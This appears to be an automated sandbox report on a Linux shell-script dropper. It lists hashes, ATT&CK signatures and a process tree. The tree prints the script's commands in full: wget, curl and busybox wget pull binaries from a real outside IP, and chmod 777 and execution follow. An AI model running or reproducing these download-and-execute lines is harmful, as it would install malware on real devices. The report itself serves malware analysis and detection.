Analysis
-
max time kernel
32s -
max time network
33s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
-
Size
10KB
-
MD5
5162438af338945d51bf275a08c71d1b
-
SHA1
08afc256b7a2d67ce5d019cf6633b8ac69ecf749
-
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
-
SHA512
f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
-
SSDEEP
96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 871 chmod 842 chmod 865 chmod 782 chmod 798 chmod 810 chmod 830 chmod 836 chmod 675 chmod 744 chmod 804 chmod 818 chmod 824 chmod 850 chmod 856 chmod 688 chmod 702 chmod 792 chmod 681 chmod 767 chmod -
Executes dropped EXE 20 IoCs
ioc pid Process /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC 676 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe 682 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 690 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 704 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 745 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV 769 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr 784 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr 793 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC 799 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm 805 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 811 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 819 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 825 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 831 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 837 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 843 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 851 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 857 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 866 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 872 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 690 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 691 rm 684 wget 685 curl 686 busybox -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB curl File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC curl File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC curl File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr curl File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV curl
Processes
-
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh1⤵PID:642
-
/bin/rm/bin/rm bins.sh2⤵PID:644
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:657
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:673
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:676
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:678
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:680
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:682
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:683
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:684
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:686
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:690
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:691
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:700
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:704
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:706
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:743
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:746
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:747
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:749
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:780
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:786
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:791
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:794
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:797
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:803
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:809
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:816
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:823
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:829
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:835
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:841
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:849
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:855
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:864
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:870
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:874
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97